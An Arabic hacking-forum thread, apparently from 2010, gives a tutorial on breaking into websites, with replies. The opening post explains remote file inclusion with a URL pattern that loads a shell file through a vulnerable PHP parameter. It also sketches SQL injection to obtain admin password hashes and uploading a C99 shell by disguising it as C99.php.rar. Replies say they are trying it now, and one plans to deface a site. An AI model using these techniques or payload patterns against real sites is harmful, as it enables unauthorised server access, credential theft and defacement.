اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس


صفحة 1 من 5 123 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 42

الموضوع: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

  1. #1
    هكر مجتهد Array الصورة الرمزية millen!um
    تاريخ التسجيل
    Jun 2010
    الدولة
    في الدنيا مؤقّتا و أنتظر الرحيل
    المشاركات
    612

    New إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس



    طبعا إخواني نعلم أن كل شيء صنعه الإنسان فيه أخطاء فهو بشر و ليس إله لذلك فالثغرات عبارة عن اخطاء يقع فيها مصمم البرنامج او سكربت معين ... ومن خلال هذه الاخطاء يجد الهكر
    منافذ لدخول الى المواقع .. والوصول الى السيرفر

    Powered by vBulletin Version = يدل على سكربت المنتدى ... وهكذا



    1 - ثغرات الفايل انكلود (( Remote File Inclusion Vulnerability ))
    يقصد بهذا النوع من الثغرات ... ان المصمم وقع فى خط برمجى وهذا الخطء يسمح لى رابط ملف خارجى بالموقع
    وطبعا الملف الخارجي يكون ( الشل = اداه اختراق )
    وهذا تكملة لما قلته لكم طبعا منذ قليل بأن كل شيء صنعه الإنسان فيه أخطاء


    - ثغرة الفايل انكلود ... طبعا نحن قلنا ان هذا النوع من الثغرات تسمح لى رابط ملف خارجى بالموقع بو اسطة متغير
    معين وطبعا الملف الخارجي يكون ( الشل = اداه اختراق )

    على سبيل المثال ... عندى موقع www.google.com/vb/ مصاب بثغرة فايل فى سكربت المنتدى الى هو VB
    والخط على صفحة faq.php والمتغير الى يسمح لى بربط الشل هو almuhajer
    فان الثغرة والاستغلال يكون بهذا الشكل ...
    /ww.google.com/vb/faq.php?almuhajer=إسم الشل.txt?cmd


    تذكر ان ثغرات الانكلود تتكون من ( السكربت المصاب / مكان المجلد / الصفحة التى يوجد بها المتغير الى يسمح بربط الشل )


    http://www.google.com/Folder/pag.php...=youshell.txt?
    الموقع = www.xxx.com
    مجلد السكربت = Folder
    الصفحة التى فيها المتغير الى يسمح لنا بجلب ملف خارجى = pag.php
    المتغير الى نربط به الملف الخارجى ( الشل ) incloud
    علامة =
    الشل بصغية تكتس = youshell.txt
    وعلامة ؟


    وكذا نحن الان عرفنا كيفية التعامل مع الثغرات الفايل انكلود

    لكن كيف يا مهاجر سنعرف هذه الملفات التي تحوي أخطاء و بالتالي نستغلّها ؟؟
    هناك مواقع ستساعدنا مثل

    من هذه المواقع http://milw0rm.org وكذلك http://securityfocus.com


    طيب ناخذ مثال من المواقع السيكورتى ... http://milw0rm.org/***apps.php ونبحث عن الثغرات الفايل الانكلود
    هذا مثال على الثغرة http://milw0rm.org/exploits/4607



    و هناك عدة أنواع من الشل تختلف في عدة أشياء مثل تخطي السايف مود و التنقل و الإمكانية التي تتيحها لك على السيرفر وفق صلاحياتك

    النوع الثاني من الثغرات
    ثغرات قواعد البيانات (( Remote SQL Injection Vulnerability )) ويقصد بها الثغرات التى تتح لنا معرفة معلومات لمجموعه معنية // علي سبيل المثال معرفه اسم الدخول وكلمة المرور لمدير الموقع
    وتعرف هذا الثغرة باسم SQL واستعملها سهل جداا .. تضع الاستغلال على المتصفح الانترنيت اكسلبور .. وتلاحظ الباس
    وغالبا يكون الباس مشفر MD5 وهناك الكثير من المواقع الى تفك التشفير ...

    ناخذ مثال على هذا النوع http://milw0rm.org/exploits/4620





    النوع الثالث ثغرات الرفع ( ثغرات مراكز التحميل ) وهى تقريبا اسهل انواع الثغرات .. فقط تقوم برفع الشل ة يقول لك ادارج الملف ثم اضغط على الابلود بمعنى رفع ... وغلبااا نحتاج الى خداع المركز
    فى الامتداد بحث يكون ا متداد الشل الى نسخدمه هكذا C99.php.rar


    تحيّاتي لكم
    almuhajer
    منتديات جيوش الهكرز

    التعديل الأخير تم بواسطة millen!um ; 07-08-2010 الساعة 07:56 AM


  2. #2
    هكر مجتهد Array الصورة الرمزية millen!um
    تاريخ التسجيل
    Jun 2010
    الدولة
    في الدنيا مؤقّتا و أنتظر الرحيل
    المشاركات
    612

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    و الله الشرح متعوب فيه أين الردود ؟؟ لن أضع دروس إذا لم أرى تفاعل
    أضن إنوا الشرح سيّئ
    الله يهديكم


  3. #3
    هكر مجتهد Array الصورة الرمزية عآزف الكيبورد
    تاريخ التسجيل
    Apr 2010
    المشاركات
    231

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    والله الشرح تمام
    وتستاهل أحلى رد وتقييم
    وان شاء الله اجربها الآن
    تقبل مروري
    اخوك
    عآزف الكيبورد



  4. #4
    هكر مجتهد Array الصورة الرمزية millen!um
    تاريخ التسجيل
    Jun 2010
    الدولة
    في الدنيا مؤقّتا و أنتظر الرحيل
    المشاركات
    612

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    بـــــــارك الله فيك على تشجيعي دائما أخي


  5. #5
    هكر مبتديء Array الصورة الرمزية krkr333
    تاريخ التسجيل
    Jan 2010
    المشاركات
    71

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    تستاهل كل احترام على المعلومات القيمه
    شكرا جزيلا وننتظر منك المزيد


  6. #6
    هكر مجتهد Array الصورة الرمزية millen!um
    تاريخ التسجيل
    Jun 2010
    الدولة
    في الدنيا مؤقّتا و أنتظر الرحيل
    المشاركات
    612

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    اقتباس المشاركة الأصلية كتبت بواسطة krkr333 مشاهدة المشاركة
    تستاهل كل احترام على المعلومات القيمه
    شكرا جزيلا وننتظر منك المزيد
    مشكور أخي على مرورك العطر ...بارك الله فيك



  7. #7
    هكر مبتديء Array الصورة الرمزية alnoofe07 HaCkeR
    تاريخ التسجيل
    Jul 2010
    المشاركات
    88

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    موضوع اكثر من راااااااااااااائع فديتك يااقلبي ..! وجاري تنزيل السكبريت لاايجاد الثغره فيه ...! وتجربته ....! وان شااء الله اوريك الاندكس لموقع ابااحي ...!...


  8. #8
    هكر مجتهد Array الصورة الرمزية millen!um
    تاريخ التسجيل
    Jun 2010
    الدولة
    في الدنيا مؤقّتا و أنتظر الرحيل
    المشاركات
    612

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    مشكور أخي ..إن شاء الله
    منور الموضوع


  9. #9
    هكر مجتهد Array الصورة الرمزية هكرز الايميلات
    تاريخ التسجيل
    May 2010
    المشاركات
    316

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    شرح وافي لبىآآ قلبك وجاري التجربة ^_+



  10. #10
    هكر مبتديء Array
    تاريخ التسجيل
    Jan 2010
    المشاركات
    17

    افتراضي رد: إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس

    شكرااا اخي والله افدتني كثيراا
    وغالبا نحتاج الى خداع المركز بالامتداد c99.php.rar
    مشكور كتير


صفحة 1 من 5 123 ... الأخيرةالأخيرة

المواضيع المتشابهه

  1. شرح استغلال ثغرات remote file include
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 89
    آخر مشاركة: 05-11-2012, 05:32 PM
  2. الدرس الثالث (دينامكية عمل Remote File include)
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 11
    آخر مشاركة: 03-16-2012, 10:14 PM
  3. رفع الشيل عبر ثغرات remote file include
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 45
    آخر مشاركة: 03-16-2012, 10:13 PM
  4. شرح ثغرات Local File Include
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 02-01-2010, 06:48 PM

وجد الزوار هذه الصفحة بالبحث عن:

شرح ثغرة الفايل انكلود

استغلال ثغرة الفايل انكلود

استغلال ثغرة فايل انكلود

ثغرات local file include

مشكور على الموضوع الرائع

مشكور على الموضوع

شرح ثغرة file includ

remote file include شرح

منتدى اختراق مواقع وسيرفرات ثغرة remote file include

اخطر ثغرات سكربت vb

أخطر الثغرات

اخطر الثغرات

استغلال فايل انكلود

remote file include

شرح ثغرة فايل انكلود

شرح ثغرة local file include

remote file inclusion

استغلال ثغرة لوكال فايل انكلود

ماهي اغطر انواء الثغرات

شرح استغلال ثغرات local file include

استغلال ريموت فايل انكلود

رابط ﺛﻐﺮﺍﺕ ﺍﻟﻔﺎﻳﻞ ﺍﻧﻜﻠﻮﺩ ::: Remote File Inclusion

eyvm thdg hk;g []

اخطر ثغراات php

ثغرة remote file include

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •